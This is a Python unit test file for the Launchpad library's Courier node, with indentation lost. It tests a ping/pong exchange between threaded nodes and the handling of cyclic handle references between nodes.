# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for launchpad.nodes.courier.node."""
import datetime
import sys
import threading
from unittest import mock
from absl.testing import absltest
import courier
from launchpad.launch.test_multi_threading import address_builder
from launchpad.nodes.courier import node as lp_courier
class Server(object):
"""Terminates once it receives the first ping() call."""
def __init__(self):
self._server = None # type: courier.Server
self._has_ping = threading.Event()
def ping(self):
self._has_ping.set()
return 'pong'
def set_courier_server(self, server: courier.Server):
self._server = server
def run(self):
self._server.Start()
self._has_ping.wait()
self._server.Stop()
class CourierNodeTest(absltest.TestCase):
def test_ping_pong(self):
node = lp_courier.CourierNode(Server)
handle = node.create_handle()
# Bind all addresses
address_builder.bind_addresses([node])
threading.Thread(target=node.run).start()
client = handle.dereference()
self.assertEqual(client.ping(), 'pong')
# Make sure Tensorflow is not imported.
self.assertNotIn('tensorflow', sys.modules)
def test_cyclic_reference(self):
def _foo(bar):
del bar # unused
def _bar(foo):
del foo # unused
foo_node = lp_courier.CourierNode(_foo)
foo_handle = foo_node.create_handle()
bar_node = lp_courier.CourierNode(_bar)
bar_handle = bar_node.create_handle()
self.assertNotIn(foo_handle, bar_node._input_handles)
self.assertNotIn(bar_handle, foo_node._input_handles)
foo_node.configure(bar=bar_handle)
bar_node.configure(foo=foo_handle)
self.assertIn(foo_handle, bar_node._input_handles)
self.assertIn(bar_handle, foo_node._input_handles)
if __name__ == '__main__':
absltest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.